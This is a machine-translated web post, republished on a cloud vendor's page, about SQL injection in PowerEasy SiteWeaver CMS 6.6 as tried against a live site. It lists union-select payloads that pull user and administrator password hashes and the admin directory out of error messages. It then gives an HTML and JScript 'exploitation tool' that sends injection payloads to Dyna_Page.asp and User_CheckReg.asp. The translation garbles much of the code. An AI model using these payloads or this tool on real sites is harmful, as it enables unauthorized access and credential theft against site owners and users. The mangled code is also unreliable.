SQL server injection into SQL query statements leads to an incorrect md5 Value

Source: Internet
Author: User

Today, a very large website found that the license.txt file contains PowerEasy SiteWeaver CMS 6.6, which seems to be the legendary mobile CMS 2006. I checked this version and said there are many vulnerabilities on the Internet, but I checked the vulnerabilities such as Dyna_Page.asp and vote one by one. asp vulnerabilities have been fixed.

Then, try User_CheckReg.asp to check whether the user has the vulnerability. In fact, it is also fixed with a limit of 4-20 characters.

However, it is strange that:

Admin union select 1 from pe_user where left (username, 32) = 1 and email = xxxx@gmail.com -- this statement returns the SQL error message directly, you can get the query value from the error message:

Microsoft ole db Provider for SQL Server Error 80040e07

Failed to convert nvarchar value 39ba86c220869068 to data type int.

/Reg/User_CheckReg.asp, row 39

In this way, the password is exposed directly.

In the same way, enter the backend path:

Admin union select 1 from pe_config where left (admindir, 16) = 1 --

Administrator password:

Admin union select 1 from pe_admin where left (password, 16) = 1 --

Appendix: (the revised webpage for the dynamic and easy content management system published on the internet mainly Revised Chinese quotation marks and incorrect SQL statements ):

<Script>
Function gb2utf8 (data ){
Var glbEncode = [];
Gb2utf8_data = data;
ExecScript ("gb2utf8_data = MidB (gb2utf8_data, 1)", "VBScript ");
Var t = escape (gb2utf8_data ). replace (/% u/g ,""). replace (/(. {2 })(. {2})/g, "%$ 2% $1 "). replace (/% ([A-Z].) % (. {2})/g, "@ $1 $2 ");
T = t. split ("@");
Var I = 0, j = t. length, k;
While (++ I <j ){
K = t [I]. substring (0, 4 );
If (! GlbEncode [k]) {
Gb2utf8_char = eval ("0x" + k );
ExecScript ("gb2utf8_char = Chr (gb2utf8_char)", "VBScript ");
GlbEncode [k] = escape (gb2utf8_char). substring (1, 6 );
}
T [I] = glbEncode [k] + t [I]. substring (4 );
}
Gb2utf8_data = gb2utf8_char = null;
Return unescape (t. join ("% "));
}

Function PostData (){
Var url = document. getElementById ("url"). value;
Var post = document. getElementById ("post"). value;
Var oXmlHttp = new ActiveXObject ("Microsoft. XMLHTTP ");
OXmlHttp. open ("POST", url, false );
If (url. indexOf ("User_CheckReg.asp")> 0) {oXmlHttp. setRequestHeader ("Content-Type", "application/x-www-form-urlencoded ");}
OXmlHttp. send (post );
Var GetResult = gb2utf8 (oXmlHttp. responseBody );
If (oXmlHttp. readyState = 4 ){
If (oXmlHttp. status = 200 ){
Document. getElementById ("getResult"). value = GetResult;
}
}
}
Function Inject (I ){
If (I = 1 ){
Document. getElementById ("url"). value = "http://www.bkjia.com//Dyna_Page.asp ";
Document. getElementById ("post"). value = <? Xml version = "1.0" encoding = "gb2312"?> <Root> <id> 21 </id> <page> 1 </page> <value> 0 union select 1, 2, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15,16, 17,18, 19,20, 21, DownloadUrl, 25, 26, 27,28, 29,30

, 31,32, 33,34, 35,36, 37,38, 39,40, 41,42, 43,44, 45,46, 47,48, 49,50, 51,52 from PE_soft where softid = 1 | 1 </value> </root>;
}
Else
{
Document. getElementById ("url"). value = "http://www.bkjia.com//Reg/User_CheckReg.asp ";
Document. getElementById ("post "). value = "UserName = admin % 20 union % 20 select % 201% 20 from % 20pe_admin % 20 where % 20 username = admin % 20and % 20 Substring (password,)> 0 ";
}
}

</Script>
<BODY>
<Div align = "center"> the latest vulnerability exploitation tool of SiteWeaver6.6 </div>
Enter URL: <br>
<Input type = "text" id = "url" value = "http://www.bkjia.com//Dyna_Page.asp" style = "width: 90%;"> <br>
Input Post: <br>
<TextArea id = "post" style = "width: 90%; height: 80;"> <? Xml version = "1.0" encoding = "gb2312"?>
<Root> <id> 21 </id> <page> 1 </page> <value> 0 union select 1, 2, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15,16, 17,18, 19,20, 21, DownloadUrl, 25,26, 27,28, 29,30, 31,32

, 33,34, 35,36, 37,38, 39,40, 41,42, 43,44, 45,46, 47,48, 49,50, 51,52 from PE_soft where softid = 1 | 1 </value> </root> </textArea>
<Div align = "center"> <input type = "button" value = "vulnerability example" onClick = "Inject (1 ); "> <input type =" button "value =" Submit "onClick =" PostData (); "> <input type =" button "value =" vulnerability 2 example "onClick =" Inject (2); "> </div>
<Hr size = 2>
Injection result: <br>
<TextArea id = "getResult" style = "width: 90%; height: 200;"> </textArea>
</BODY>

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.